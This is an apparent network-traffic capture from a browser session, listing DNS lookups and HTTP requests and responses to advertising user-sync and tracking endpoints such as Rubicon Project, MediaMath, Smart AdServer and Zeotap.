171.78.68.104.in-addr.arpa

Request

171.78.68.104.in-addr.arpa

IN PTR

Response

171.78.68.104.in-addr.arpa

IN PTR

a104-68-78-171deploystaticakamaitechnologiescom
DNS

18.127.47.198.in-addr.arpa

Request

18.127.47.198.in-addr.arpa

IN PTR

Response
DNS

109.55.17.81.in-addr.arpa

Request

109.55.17.81.in-addr.arpa

IN PTR

Response
DNS

24.96.55.23.in-addr.arpa

Request

24.96.55.23.in-addr.arpa

IN PTR

Response

24.96.55.23.in-addr.arpa

IN PTR

a23-55-96-24deploystaticakamaitechnologiescom
DNS

131.169.93.208.in-addr.arpa

Request

131.169.93.208.in-addr.arpa

IN PTR

Response
DNS

117.174.228.46.in-addr.arpa

Request

117.174.228.46.in-addr.arpa

IN PTR

Response
DNS

84.5.157.37.in-addr.arpa

Request

84.5.157.37.in-addr.arpa

IN PTR

Response
DNS

116.158.57.154.in-addr.arpa

Request

116.158.57.154.in-addr.arpa

IN PTR

Response
DNS

124.74.67.3.in-addr.arpa

Request

124.74.67.3.in-addr.arpa

IN PTR

Response

124.74.67.3.in-addr.arpa

IN PTR

ec2-3-67-74-124eu-central-1compute amazonawscom
DNS

159.156.18.52.in-addr.arpa

Request

159.156.18.52.in-addr.arpa

IN PTR

Response

159.156.18.52.in-addr.arpa

IN PTR

ec2-52-18-156-159 eu-west-1compute amazonawscom
GET

https://eus.rubiconproject.com/usync.html?p=rise_engage&endpoint=eu

Request

GET /usync.html?p=rise_engage&endpoint=eu HTTP/1.1
Host: eus.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://pbs-cs.yellowblue.io/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 200 OK

Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 21 Mar 2024 15:32:19 GMT
ETag: "2052a-10d-6142d69a886c0"
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 224
Content-Type: text/html; charset=UTF-8
Date: Sun, 26 May 2024 02:06:57 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET

https://eus.rubiconproject.com/usync.js

Request

GET /usync.js HTTP/1.1
Host: eus.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://eus.rubiconproject.com/usync.html?p=rise_engage&endpoint=eu
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin

Response

HTTP/1.1 200 OK

Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.3
p3p: CP="NOI CURa ADMa DEVa TAIa OUR # BUS IND UNI COM NAV INT"
Last-Modified: Wed, 15 May 2024 07:37:36 GMT
Content-Encoding: gzip
Content-Length: 11049
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=10958
Expires: Sun, 26 May 2024 05:09:36 GMT
Date: Sun, 26 May 2024 02:06:58 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET

https://eus.rubiconproject.com/usync.html?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1---

Request

GET /usync.html?gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA&us_privacy=1--- HTTP/1.1
Host: eus.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.se7ensins.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 200 OK

Server: Apache/2.2.15 (CentOS)
Last-Modified: Thu, 21 Mar 2024 15:32:19 GMT
ETag: "2052a-10d-6142d69a886c0"
Accept-Ranges: bytes
Content-Encoding: gzip
Content-Length: 224
Content-Type: text/html; charset=UTF-8
Date: Sun, 26 May 2024 02:07:32 GMT
Connection: keep-alive
Vary: Accept-Encoding
DNS

e8960.b.akamaiedge.net

Request

e8960.b.akamaiedge.net

IN A

Response

e8960.b.akamaiedge.net

IN A

23.55.98.169
DNS

e8960.b.akamaiedge.net

Request

e8960.b.akamaiedge.net

IN AAAA

Response
DNS

rtb.mfadsrvr.com

Request

rtb.mfadsrvr.com

IN A

Response

rtb.mfadsrvr.com

IN CNAME

pool.dorpat.iponweb.net

pool.dorpat.iponweb.net

IN CNAME

dorpat.geo.iponweb.net

dorpat.geo.iponweb.net

IN CNAME

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.197.7.178

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

52.29.4.131

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

3.69.205.38

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

3.123.208.101

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.157.153.25

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.158.184.198
DNS

sync.mathtag.com

Request

sync.mathtag.com

IN A

Response

sync.mathtag.com

IN CNAME

pixel-origin.mathtag.com

pixel-origin.mathtag.com

IN A

74.121.140.211

pixel-origin.mathtag.com

IN A

216.200.232.249

pixel-origin.mathtag.com

IN A

216.200.232.253
DNS

pixel-eu.rubiconproject.com

Request

pixel-eu.rubiconproject.com

IN A

Response

pixel-eu.rubiconproject.com

IN CNAME

pixel-eu.rubiconproject.net.akadns.net

pixel-eu.rubiconproject.net.akadns.net

IN A

69.173.156.149

pixel-eu.rubiconproject.net.akadns.net

IN A

69.173.156.148
DNS

cs.admanmedia.com

Request

cs.admanmedia.com

IN A

Response

cs.admanmedia.com

IN A

80.77.87.162
DNS

t.adx.opera.com

Request

t.adx.opera.com

IN A

Response

t.adx.opera.com

IN CNAME

outspot2-ams.adx.opera.com

outspot2-ams.adx.opera.com

IN A

82.145.213.8
DNS

ssbsync-global.smartadserver.com

Request

ssbsync-global.smartadserver.com

IN A

Response

ssbsync-global.smartadserver.com

IN CNAME

usersync-geo-global.usersync-prod-sas.akadns.net

usersync-geo-global.usersync-prod-sas.akadns.net

IN CNAME

ssbsync-euw1.smartadserver.com

ssbsync-euw1.smartadserver.com

IN A

81.17.55.170

ssbsync-euw1.smartadserver.com

IN A

89.149.192.244

ssbsync-euw1.smartadserver.com

IN A

89.149.192.197

ssbsync-euw1.smartadserver.com

IN A

81.17.55.122

ssbsync-euw1.smartadserver.com

IN A

89.149.192.245

ssbsync-euw1.smartadserver.com

IN A

89.149.192.76

ssbsync-euw1.smartadserver.com

IN A

89.149.192.196

ssbsync-euw1.smartadserver.com

IN A

81.17.55.108

ssbsync-euw1.smartadserver.com

IN A

89.149.192.75

ssbsync-euw1.smartadserver.com

IN A

81.17.55.123

ssbsync-euw1.smartadserver.com

IN A

81.17.55.171

ssbsync-euw1.smartadserver.com

IN A

81.17.55.109
DNS

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

Request

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

Response

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

52.29.4.131

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.197.7.178

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

3.123.208.101

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.157.153.25

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

18.158.184.198

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN A

3.69.205.38
DNS

spl.zeotap.com

Request

spl.zeotap.com

IN A

Response

spl.zeotap.com

IN A

104.22.50.98

spl.zeotap.com

IN A

172.67.40.173

spl.zeotap.com

IN A

104.22.51.98
DNS

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

Request

elb-aws-fr-dorpat-283474803.eu-central-1.elb.amazonaws.com

IN AAAA

Response
DNS

outspot2-ams.adx.opera.com

Request

outspot2-ams.adx.opera.com

IN A

Response

outspot2-ams.adx.opera.com

IN A

82.145.213.8
GET

https://spl.zeotap.com/?zdid=678&env=mWeb&eventType=pageview&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /?zdid=678&env=mWeb&eventType=pageview&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/2.0
host: spl.zeotap.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: image/avif,image/webp,*/*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://onetag-sys.com/
sec-fetch-dest: image
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
te: trailers

Response

HTTP/2.0 403

date: Sun, 26 May 2024 02:06:58 GMT
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
referrer-policy: same-origin
cache-control: max-age=15
expires: Sun, 26 May 2024 02:07:13 GMT
vary: Accept-Encoding
strict-transport-security: max-age=2592000; includeSubDomains; preload
x-content-type-options: nosniff
server: cloudflare
cf-ray: 889a357d3f4c971a-AMS
content-encoding: br
DNS

pixel-origin.mathtag.com

Request

pixel-origin.mathtag.com

IN A

Response

pixel-origin.mathtag.com

IN A

216.200.232.249

pixel-origin.mathtag.com

IN A

74.121.140.211

pixel-origin.mathtag.com

IN A

216.200.232.253
DNS

outspot2-ams.adx.opera.com

Request

outspot2-ams.adx.opera.com

IN AAAA

Response
DNS

cs.admanmedia.com

Request

cs.admanmedia.com

IN A

Response

cs.admanmedia.com

IN A

80.77.87.166
DNS

pixel-origin.mathtag.com

Request

pixel-origin.mathtag.com

IN AAAA

Response
DNS

pixel-eu.rubiconproject.net.akadns.net

Request

pixel-eu.rubiconproject.net.akadns.net

IN A

Response

pixel-eu.rubiconproject.net.akadns.net

IN A

69.173.156.148

pixel-eu.rubiconproject.net.akadns.net

IN A

69.173.156.149
DNS

cs.admanmedia.com

Request

cs.admanmedia.com

IN AAAA

Response
DNS

pixel-eu.rubiconproject.net.akadns.net

Request

pixel-eu.rubiconproject.net.akadns.net

IN AAAA

Response
DNS

spl.zeotap.com

Request

spl.zeotap.com

IN A

Response

spl.zeotap.com

IN A

172.67.40.173

spl.zeotap.com

IN A

104.22.50.98

spl.zeotap.com

IN A

104.22.51.98
DNS

s.amazon-adsystem.com

Request

s.amazon-adsystem.com

IN A

Response

s.amazon-adsystem.com

IN A

209.54.182.161
DNS

s.amazon-adsystem.com

Request

s.amazon-adsystem.com

IN A

Response

s.amazon-adsystem.com

IN A

52.46.151.131
DNS

spl.zeotap.com

Request

spl.zeotap.com

IN AAAA

Response

spl.zeotap.com

IN AAAA

2606:4700:10::6816:3262

spl.zeotap.com

IN AAAA

2606:4700:10::6816:3362

spl.zeotap.com

IN AAAA

2606:4700:10::ac43:28ad
DNS

s.amazon-adsystem.com

Request

s.amazon-adsystem.com

IN AAAA

Response
GET

https://pixel-eu.rubiconproject.com/exchange/sync.php?p=onetag&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA

Request

GET /exchange/sync.php?p=onetag&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAA.egAAAbgAAAAA HTTP/1.1
Host: pixel-eu.rubiconproject.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://onetag-sys.com/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

Response

HTTP/1.1 302 Found

P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: 0
X-RPHost: 7ab15ef0d9c4b64200bd5d6be68979a8
